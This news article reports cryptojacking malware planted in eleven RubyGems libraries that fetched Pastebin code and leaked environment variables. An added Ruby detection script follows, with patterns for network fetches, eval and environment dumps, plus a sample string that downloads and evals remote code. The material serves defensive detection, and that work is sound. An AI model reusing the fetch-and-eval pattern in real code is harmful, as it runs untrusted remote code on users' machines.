Cryptojacking Code Found in Eleven Open Libraries, Thousands Infected

11 open-source code libraries written in Ruby contained cryptojacking code and were downloaded thousands of times.

Cryptojacking code was found in 11 open-source code libraries written in Ruby, which have been downloaded thousands of times.

Industry news outlet Decrypt reported on Aug. 21 that cryptojacking code had been added to 11 open-source Ruby libraries distributed on the RubyGems platform. Per the report, the infected libraries were downloaded over three and a half thousand times.

Hackers reportedly downloaded the software, infected it with malware, and subsequently re-posted it on RubyGems. 

The malicious code was first noticed by a GitHub user, who posted about the issue on Aug. 19. He pointed out that, when executed, the library downloaded additional code from text hosting service Pastebin, which then triggered the malicious mining.

Furthermore, the malware also sent the address of the infected host to the attacker alongside environment variables which may have included credentials.
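
As an added illustration (not code from the article, the GitHub report or RubyGems), the following Ruby heuristic flags source files that combine the behaviours described above: network access, including fetches from Pastebin, together with dynamic evaluation or a dump of the environment. The patterns, function names and sample strings are assumptions constructed for this example.

```ruby
# Added example: heuristic check for the behaviour the article describes.
# Patterns and names are illustrative assumptions, not incident signatures.
INDICATORS = {
  paste_fetch:  %r{https?://(?:www\.)?pastebin\.com/}i,
  net_request:  /\b(?:Net::HTTP|open-uri|URI\.open)\b/,
  dynamic_eval: /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  env_dump:     /\bENV\.(?:to_h|to_hash|to_a|inspect|to_json|each|map)\b/
}.freeze

# Constructed sample inputs (not taken from the infected gems).
SAMPLE_SUSPICIOUS = <<~'RUBY'
  require "net/http"
  payload = Net::HTTP.get(URI("https://pastebin.com/raw/PLACEHOLDER"))
  eval(payload)
RUBY
SAMPLE_BENIGN = <<~'RUBY'
  require "json"
  # eval is never used here
  def parse(text)
    JSON.parse(text)
  end
RUBY

# Names of the indicators present in a source string, ignoring comment lines.
def indicators_in(source)
  code = source.each_line.reject { |line| line.strip.start_with?("#") }.join
  INDICATORS.select { |_name, pattern| code.match?(pattern) }.keys
end

# :suspicious when network access is combined with eval or an ENV dump,
# :review for an isolated indicator, :clean otherwise.
def verdict(source)
  hits = indicators_in(source)
  network = hits.include?(:paste_fetch) || hits.include?(:net_request)
  return :suspicious if network && (hits.include?(:dynamic_eval) || hits.include?(:env_dump))
  hits.empty? ? :clean : :review
end

# Map each non-clean *.rb file under root to its verdict.
def scan_tree(root)
  Dir.glob(File.join(root, "**", "*.rb")).sort.each_with_object({}) do |path, out|
    result = verdict(File.binread(path).force_encoding("UTF-8").scrub)
    out[path] = result unless result == :clean
  end
end

if __FILE__ == $PROGRAM_NAME
  ARGV.each { |root| scan_tree(root).each { |path, v| puts "#{v}\t#{path}" } }
end
```

Run it with the gem installation directory as the argument, for example the `gems` folder under the path printed by `gem env gemdir`. Hits are triage leads only, since legitimate gems also use `Net::HTTP` and `eval`, so flagged files still need manual review.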

Some users suggested that RubyGems contributors should enable two-factor authentication on their accounts given that, if compromised, they could be used to infect many systems.

A seemingly targeted attack

Five of the libraries infected were cryptocurrency-specific, with names like doge-coin, bitcoin_vanity, coin_base and blockchain_wallet. The last two were reportedly the most downloaded, with coin_base counting 424 downloads and blockchain_wallet 423.

As Cointelegraph recently reported, cybersecurity company Varonis has discovered a new cryptojacking virus, dubbed “Norman,” that aims to mine the cryptocurrency Monero (XMR) and evade detection.

Author: Adrian Zmudzinski


This content is courtesy of, and owned and copyrighted by, https://cointelegraph.com and its author.
